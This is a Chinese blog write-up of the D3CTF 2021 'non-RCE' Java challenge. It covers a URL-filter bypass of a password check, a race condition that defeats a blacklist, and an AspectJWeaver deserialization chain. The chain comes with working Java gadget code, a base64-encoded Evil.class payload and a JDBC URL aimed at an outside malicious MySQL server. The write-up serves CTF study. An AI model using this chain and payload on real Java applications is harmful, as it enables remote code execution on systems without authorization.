D3CTF2021-non-RCE

已于 2022-03-07 19:54:09 修改
阅读量4.1k 收藏
点赞数 1
分类专栏: 比赛WP 文章标签: Java
于 2022-03-07 19:53:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/123338065
版权

non-RCE

前言

去年D3CTF的题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。

password绕过

不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。

第一重过滤是这个:

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        HttpServletResponse res = (HttpServletResponse) servletResponse;
        String password = req.getParameter("password");
        if (password == null) {
            res.sendError( HttpServletResponse.SC_UNAUTHORIZED, "The password can not be null!");
            return;
        }
        try {
            //you can't get this password forever, because the author has forgotten it.
            if (password.equals(PASSWORD)) {
                filterChain.doFilter(servletRequest, servletResponse);
            } else {
                res.sendError(HttpServletResponse.SC_UNAUTHORIZED, "The password is not correct!");
            }
        } catch (Exception e) {
            res.sendError( HttpServletResponse.SC_BAD_REQUEST, "Oops!");
        }
    }

不知道密码,但是考虑到有一系列的filter,对于URL的那个filter:

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        HttpServletResponse res = (HttpServletResponse) servletResponse;
        String url = req.getRequestURI();

        if (url.contains("../") && url.contains("..") && url.contains("//")) {
            res.sendError(HttpServletResponse.SC_BAD_REQUEST, "The '.' & '/' is not allowed in the url");
        } else if (url.contains("\20")) {
            res.sendError(HttpServletResponse.SC_BAD_REQUEST, "The empty value is not allowed in the url.");
        } else if (url.contains("\\")) {
            res.sendError(HttpServletResponse.SC_BAD_REQUEST, "The '\\' is not allowed in the url.");
        } else if (url.contains("./")) {
            String filteredUrl = url.replaceAll("./", "");
            req.getRequestDispatcher(filteredUrl).forward(servletRequest, servletResponse);
        } else if (url.contains(";")) {
            String filteredUrl = url.replaceAll(";", "");
            req.getRequestDispatcher(filteredUrl).forward(servletRequest, servletResponse);
        } else {
            filterChain.doFilter(servletRequest, servletResponse);
        }
    }

如果满足存在./或者;将会置空并且直接转发,而不是交给filterChain处理。这里应该涉及到了filter的顺序问题,没有深入去了解,不过肯定这个URLfilter是在前面的,不然这题的password就没法绕过了。

所以url中包含./或者;即可绕过password的认证。

BlackList绕过

public String[] blackList = new String[] {"%", "autoDeserialize"};

            if (!BlackListChecker.check(jdbcUrl)) {
                
    public static boolean check(String s) {
        BlackListChecker blackListChecker = getBlackListChecker();
        blackListChecker.setToBeChecked(s);
        return blackListChecker.doCheck();
    }

主要是过滤了autoDeserialize导致JDBC反序列化没法成功,但是仔细看一下最后的判断:

    public boolean doCheck() {
        for (String s : blackList) {
            if (toBeChecked.contains(s)) {
                return false;
            }
        }
        return true;
    }

是对toBeChecked进行校验。

每次都会执行这一步:

    public void setToBeChecked(String s) {
        this.toBeChecked = s;
    }

从这个判断写的这么绕就能感觉到不对劲了。。确实是故意写成这样的,可以利用Servlet的线程问题进行攻击(之前有个比赛也遇到了,之后再具体了解一下)。拿BP发包不停发包,1个发会被check的URL,1个发不会被check的URL就行了。

aspectjweaver反序列化

国赛那里已经出现过了,对于这题来说,能够调用到DataMap#Entry的`hashCode函数:

        public int hashCode() {
            return DataMap.hash(this.getKey()) ^ DataMap.hash(this.getValue());
        }

调用DataMap#EntrygetValue()

        public Object getValue() {
            if (this.value == null) {
                this.value = DataMap.this.get(this.key);
            }

            return this.value;
        }

调用DataMapget()

    public Object get(Object key) {
        Object v = null;
        if (this.values != null) {
            v = this.values.get(key);
        }

        if(v == null){
            v = this.wrapperMap.get(key);
            if (this.values == null) {
                this.values = new HashMap(this.wrapperMap.size());
            }

            this.values.put(key, v);
        }

        return  v;
    }

最后调用了this.values.put(key, v);,触发put方法。

主要的问题就是理清内部类和DataMap之间的关系,理清之后就是构造了。这里我没拿HashSet来构造,直接拿HashMap构造了,Evil.class还是老样子:

        Class clazz = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
        Constructor declaredConstructor = clazz.getDeclaredConstructor(String.class,int.class);
        declaredConstructor.setAccessible(true);
        HashMap map = (HashMap)declaredConstructor.newInstance(".\\target\\classes\\", 123);
        String filename = "Evil.class";
        String content = "yv66vgAAADQAIgoABwATCgAUABUHABYIABcKABQAGAcAGQcAGgcAGwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApyZWFkT2JqZWN0AQAeKExqYXZhL2lvL09iamVjdElucHV0U3RyZWFtOylWAQAKRXhjZXB0aW9ucwcAHAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAkACgcAHQwAHgAfAQAQamF2YS9sYW5nL1N0cmluZwEABGNhbGMMACAAIQEABEV2aWwBABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAGAAcAAQAIAAAAAgABAAkACgABAAsAAAAdAAEAAQAAAAUqtwABsQAAAAEADAAAAAYAAQAAAAMAAgANAA4AAgALAAAALQAFAAIAAAARuAACBL0AA1kDEgRTtgAFV7EAAAABAAwAAAAKAAIAAAAGABAACAAPAAAABAABABAAAQARAAAAAgAS";
        HashMap wrapperMap = new HashMap();
        wrapperMap.put(filename,Base64.getDecoder().decode(content));
        DataMap dataMap = new DataMap(new HashMap(),new HashMap());
        Constructor entryConstructor = Class.forName("checker.DataMap$Entry").getDeclaredConstructor(checker.DataMap.class,java.lang.Object.class);
        entryConstructor.setAccessible(true);
        Object obj = entryConstructor.newInstance(dataMap,filename);
        HashMap expMap = new HashMap();
        expMap.put(obj,1);
        SerializeUtil.setFieldValue(dataMap,"wrapperMap",wrapperMap);
        SerializeUtil.setFieldValue(dataMap,"values",map);
        byte[] serialize = SerializeUtil.serialize(expMap);
        //SerializeUtil.unserialize(serialize);
        System.out.println(Base64.getEncoder().encodeToString(serialize));

        System.out.println(Base64.getEncoder().encodeToString(SerializeUtil.serialize(new Evil())));

写文件到rce

这步国赛那题已经学过了,直接打了。

利用JDBC反序列化的脚本(网上都有),去把打印出来的2串Base64分别写到payload文件中然后攻击触发,第一次触发会往./target/classes/下面写Evil.class,第二次会反序列化Evil类实现rce。

jdbc:mysql://121.5.169.223:33307/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
bfengj
关注
专栏目录
D3CTF 2022 d3fuse
weixin_46483787的博客
03-12 493
首先来了解一下什么是fuse 简而言之就是一个二进制文件,但是运行起来之后实现了一个文件系统的功能。 然后我们看题目给的二进制文件: main_real函数的参数ida没有很好的翻译出来,我们看一下源码: 可以看到第三个参数是operation,这里直接放重命名好的: 到这里我们大概摸清了程序功能,其实就是通过这样一个函数表,起了一个用户态文件系统,在文件系统中对文件的各项操作都是由这些函数来实现的。 需要在这些函数中找漏洞 来看rename函数: 这个函数可以和mv file1 file2这个指
non_RCE
03-12
这是“非RCE?”的源代码。 挑战
D3ctf-D3MUG(u3d
weixin_52369224的博客
03-08 4696
第一次遇到u3d,寄! 用ilcppdumper dump出dll文件 选择运行Il2CppDumper.exe并依次选择il2cpp.so的可执行文件和global-metadata.dat文件 dump出的dll文件在DummyDll里面。 ⽤dnspy查看AssemblyCSharp.dll,定位到关键函数GameManager.NoteHit 然后用ida打开lib2cpp.so文件 运行我们ilcppdumper里面的ida_py3脚本。然后再点击script.json 然
破解哈希(ctf)
最新发布
qq_69100706的博客
07-29 365
在CTF(Capture The Flag)竞赛中,破解哈希是一个常见的挑战类型,通常涉及密码学和逆向工程。参与者需要识别出哈希算法并尝试还原原始输入,这通常是指一个密码。
D3CTF2024
qq_61670993的博客
05-04 956
失败如我
d3ctf_easyQuantum
03-13
easyQuantum cap.pcapng用Wireshark打开,清晰可见的TCP的三次握手和四次挥手: 因此需要仔细分析中间的数据传输过程。 注意到某些数据包内有“ numpy”等字符串: 于是想到可能是某种兼容Python的序列化方法。 又注意到有固定的头部数据: 而pickle序列化时也有固定的头部数据(协议版本4.0): 于是尝试利用pickle进行反序列化。示例如下: import pyshark import pickle cap = pyshark . FileCapture ( 'cap.pcapng' ) test_pack = cap [ 3 ] data = test_pack . data . data . binary_value deserialized = pickle . loads ( data ) print ( deserialized ) 得
D3CTF2021-d3dev
11-05
附件
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
tenable-ctf-2021-rawrxd:Tenable CTF 2021的文章。团队名称:rawrxd。 团队排名:307团队积分:1525
02-23
tenable-ctf-2021-rawrxd:Tenable CTF 2021的文章。团队名称:rawrxd。 团队排名:307团队积分:1525
d3ctf_2019_ezfile(文件流fileno的巧妙利用)
seaaseesa的博客
06-11 1045
d3ctf_2019_ezfile(文件流fileno的巧妙利用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能存在UAF 程序里使用的是write输出,因此劫持IO_2_1_stdout泄露不了数据。 Add功能的size固定 Encrypt功能存在栈溢出 程序一开头有一个这个 我们可以利用堆漏洞劫持IO_2_1_stdin,将里面的fileno改为3,然后利用encrypt功能里的栈溢出,采用低字节覆盖法,将返回地址覆盖到此处 .
2021 AntCTF&D3CTF之jumpjump
qq_43682582的博客
03-08 433
AntCTF&D3CTF之jumpjump前言正题后记 前言 其他的都太难惹。。。 正题 Ida打开,shift+F12查看字符串: 跟进后来到关键函数,F5大法查看伪代码: 通过分析,有两个关键函数,sub_40189D()和sub_40191E(),第一个函数: 继续跟进: for循环里的就是第一轮异或,后面的sub_408A80()函数经过动态调试发现为反调试手段, 只要不进入该函数,直接F9到下一个断点前即可继续运行程序。 第二个函数: 将第一轮异或后的值加4之后与0x33异或,再与
D3CTF 8-bit解题详解
lllffg的博客
03-08 1093
8-bit pub (在模板注入的路上莽了一整天,然后发现不是模板注入23333333) 尝试SQL注入,猜测后台sql语句 select * from user where username='xxx' and password='xxx'; 一系列操作后没有结果 源码中调用了这个模块 node.js中 express-session的安装使用及session的持久化 express-session中的resave和saveUninitialized express+session实现简易身份认证 然
D^3CTF2022 Crypto 复现
qq_41626232的博客
04-26 646
没什么师傅出后面题的wp什么的,题目质量确实高。
d3ctf 2022 re复现
个人博客:http://s0rry.cn
03-31 1261
接触到很多新东西,平时刷题几乎遇不到
2019 D^3CTF new_heap详细题解
seaaseesa的博客
11-28 1480
new_heap(高质量题) 这题是2019 d3ctf赛的一题,当时没做出来,后来看了大佬的exp脚本,慢慢研究,终于明白了原理,现在,我们就来详细的解析一下这题 首先,我们还是检查一下程序的保护机制,保护全开 再看一下给我们的libc.so.6的版本,可见是glibc2.29,那么对于堆的管理,就存在tcache机制 程序只有简单的3个功能,没有show,也没有edit,这让我...
2022d3CTF 部分web题基础知识学习
weixin_51458899的博客
03-23 4229
[d3ctf2020]shorter rome1.0反序列化链调试见上面(第三周标题为[d3ctf2020]的内容) 当时参考的资料: ROME反序列化分析 (c014.cn) javassist使用全解析 - rickiyang - 博客园 (cnblogs.com) https://xz.aliyun.com/t/6787#toc-8 (java反射入门) https://developer.huawei.com/consumer/cn/forum/topic/020447303398723010
BUUCTF-Blacklist
m0_47571887的博客
11-10 698
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值